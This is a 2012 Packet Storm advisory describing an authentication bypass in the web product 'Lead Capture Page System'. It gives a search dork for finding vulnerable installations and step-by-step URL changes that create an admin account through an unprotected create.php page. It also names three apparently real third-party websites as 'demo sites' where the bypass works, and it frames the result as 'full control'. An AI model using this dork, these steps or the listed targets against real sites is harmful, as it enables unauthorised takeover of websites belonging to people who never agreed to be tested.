Lead Capture Page System Authentication Bypass

2012-01-13T00:00:00
ID PACKETSTORM:108619
Type packetstorm
Reporter ITTIHACK
Modified 2012-01-13T00:00:00

Description

                                        
                                            `(Lead Capture Page System) Authentication Bypass Vulnerability  
  
Software : Lead Capture Page System   
Date : 1/12/2012   
Vendor : http://leadcapturepagesystem.com   
Get App. : http://leadcapturepagesystem.com/order.php?id=1   
Price : $235   
Dork : intext:"Powered By Lead Capture Page System"   
Author : ITTIHACK   
Home : http://ittihack.com   
  
  
Description:  
By this exploit, you can bypass admin's login page, follow these steps to learn more:  
  
1) Use the dork above to find yours.  
2) Go to http://site/admin  
Now you will be redirected to login page: http://site/admin/login.php, you are required to login, just change the link above by this:  
3) replace login.php with create.php --> http://site/admin/create.php  
4) Fill up the blanks, and Click on: Create Account  
5) Now change the URL to: http://site/admin/account.php  
6) That's all, full control XD  
  
  
  
Demo Sites: http://goldengatetowealth.org/admin ---> http://goldengatetowealth.org/admin/create.php  
http://instantmoneynetwork.com/admin ---> http://instantmoneynetwork.com/admin/create.php  
http://silver2up.com/admin ---> http://silver2up.com/admin/create.php   
  
  
  
#Greatz to: ___ ____ ____  
#````______/```\__//```\__/____\  
#``_/```\_/``:```````````//____\  
#`/|``````:``:``..``````/ Reinie \   
#|`|`````::`````::``````\````````/  
#|`|`````:|`````||`````\`\______/  
#|`|`````||`````||``````|\``/``|  
#`\|`````||`````||``````|```/`|`\   
#``|`````||`````||``````|``/`/_\`\  
#``|`___`||`___`||``````|`/``/````\  
#```\_-_/``\_-_/`|`____`|/__/``````\  
#````````````````_\_--_/````\`````/   
#```````````````/____```````````/  
#``````````````/`````\`````````/  
#``````````````\______\_______/  
`